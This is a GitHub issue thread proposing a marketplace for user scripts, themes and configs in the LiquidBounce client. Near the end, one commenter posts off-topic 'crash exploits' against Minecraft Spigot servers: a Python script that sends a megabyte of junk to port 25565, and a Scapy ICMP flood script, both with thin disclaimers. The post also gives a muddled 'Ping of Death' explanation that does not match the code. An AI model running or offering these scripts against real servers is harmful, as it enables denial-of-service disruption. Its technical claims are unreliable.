### ISSUE TITLE
[FEATURE] LiquidBounce Marketplace

### ISSUE THREAD

**Issue by 1zun4secondary** [CCBlueX/LiquidBounce#1024]
### Describe your feature request.

Nextgen is going to feature support for custom scripts, [themes](https://github.com/CCBlueX/LiquidBounce/issues/255) and configs. This means we have to create a place where you can share and find these user created resources.

Our scripts page would be the perfect use case for this if we would extend it further. It currently has no real use because the login does not work and there is no integration into the clients itself, but this will change with this issue.

A lot of API implmentation is required which has to be done by myself and also a design needs to be done for the integration into nextgen.

It is a idea for now, but one of my top priority for myself.

Legacy might feature something similiar, which I already introduced with my work on a settings GUI.

### Additional context

You might also be wondering. Marketplace? Do I have to buy scripts etc? No, this will not mean that we will introduce payments into our client. All resources will be free like our client. It is just the best name that came into my mind.

**Comment by CuteistCat** [comment]
I sugest the name "Repository"

**Comment by CuteistCat** [comment]
As it dosnet suggest there is payment

**Comment by dudethis** [comment]
> I sugest the name "Repository"
community marketplace sounds better

**Comment by gaoyu06** [comment]
Why not add payment feature?
I think it can promote more devs participate in and make the community more active.
Many open source projects also works this way.
The paid scripts/configs must appears as the custom community become big enough, so why not make it official?

**Comment by SmugNugg** [comment]
> Why not add payment feature? I think it can promote more devs participate in and make the community more active. Many open source projects also works this way. The paid scripts/configs must appears as the custom community become big enough, so why not make it official?

no payment i am broke

**Comment by ghost** [comment]
> > Why not add payment feature? I think it can promote more devs participate in and make the community more active. Many open source projects also works this way. The paid scripts/configs must appears as the custom community become big enough, so why not make it official?
> 
> no payment i am broke

why not make a button "donate to developer"

**Comment by 1zun4** [comment]
> Why not add payment feature? I think it can promote more devs participate in and make the community more active. Many open source projects also works this way. The paid scripts/configs must appears as the custom community become big enough, so why not make it official?

Because it requires additional legal work. I cannot tell if this is possible to handle for us as well.

**Comment by liquidbounce-thebestclient** [comment]
liquidbounce is not free anymore, so can update hvh config in marketplace pls?

**Comment by MukjepScarlet** [comment]
I want to know if it will let the frontend get more complicated. It looks like deploying a forum into client. Will it require all custom themes to implement?

**Comment by 1zun4** [comment]
A custom theme could change the look and feel of the marketplace, but we are likely to force it to be standardised by our default to ensure no one "breaks" it. All official themes will not be allowed to include a custom marketplace look.

**Comment by MukjepScarlet** [comment]
A stable HTML and JS SPA for marketplace, and users are able to edit CSS or use other DSL to customize it?

**Comment by 1zun4** [comment]
No. The way it works at the moment with any of the other pages. We write it using Svelte and provide the ability to interact with it through our Client Rest API.

**Comment by DataM0del** [comment]
> We write it using Svelte.

> Client Rest API.

![chromium](https://github.com/user-attachments/assets/5c12d1b4-5210-431f-a35e-fc5ea297ece4)

**Comment by 1255656** [comment]
Crash Exploits

Ping of Death    MINECRAFT spigot 1.21.4 A single oversized ICMP packet could crash systems 


Craft a malformed packet (e.g., oversized or invalid data)

Python Script (Using Scapy)

import socket
import struct

target_ip = "127.0.0.1"  # Only test on YOUR OWN server
target_port = 25565       # Default Minecraft port

# Craft a malformed packet (e.g., oversized or invalid data)
payload = b"\x00" * 1000000  # 1MB of junk data (adjust size)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.send(payload)
sock.close()

**Comment by 1255656** [comment]
The original PoD worked by sending an ICMP Echo Request packet that, when reassembled by the target system, exceeded the maximum allowed IP packet size (65,535 bytes). This would often cause a buffer overflow, leading to a system crash, freeze, or reboot. The attacker would fragment the oversized packet into smaller, valid fragments, and the vulnerability lay in the target's reassembly process.

Crash Exploits

Ping of Death MINECRAFT spigot 1.21.4 A single oversized ICMP packet could crash systems

Craft a malformed packet (e.g., oversized or invalid data)

Python Script (Using Scapy)`
`
from scapy.all import *
import time

# --- IMPORTANT ---
# ONLY use this against servers you own and have explicit permission to test.
# Running this against other systems is illegal and harmful.
# This script is for educational purposes only.
# --- IMPORTANT ---

target_ip = "YOUR_TARGET_SERVER_IP"  # Replace with the IP of your server
num_packets = 10000  # Number of ICMP packets to send
packet_size = 100    # Size of the data payload in bytes (can be varied)
interval = 0.001     # Time between packets in seconds (adjust for desired rate)

print(f"Starting ICMP flood to {target_ip}...")

try:
    for i in range(num_packets):
        # Craft an ICMP Echo Request packet
        # IP(dst=target_ip): Destination IP address
        # ICMP(): ICMP header (type='echo-request' is default)
        # Raw(load='X' * packet_size): Data payload for the packet
        packet = IP(dst=target_ip) / ICMP() / Raw(load='X' * packet_size)
        send(packet, verbose=0) # Send the packet, verbose=0 suppresses output
        if (i + 1) % 1000 == 0:
            print(f"Sent {i + 1} packets...")
        time.sleep(interval)
except KeyboardInterrupt:
    print("\nAttack stopped by user.")
except Exception as e:
    print(f"An error occurred: {e}")
finally:
    print("ICMP flood finished.")
``

**Comment by 1255656** [comment]
The original PoD worked by sending an ICMP Echo Request packet that, when reassembled by the target system, exceeded the maximum allowed IP packet size (65,535 bytes). This would often cause a buffer overflow, leading to a system crash, freeze, or reboot. The attacker would fragment the oversized packet into smaller, valid fragments, and the vulnerability lay in the target's reassembly process.

[New Text Document (3).txt](https://github.com/user-attachments/files/20688974/New.Text.Document.3.txt)

**Comment by MukjepScarlet** [comment]
1
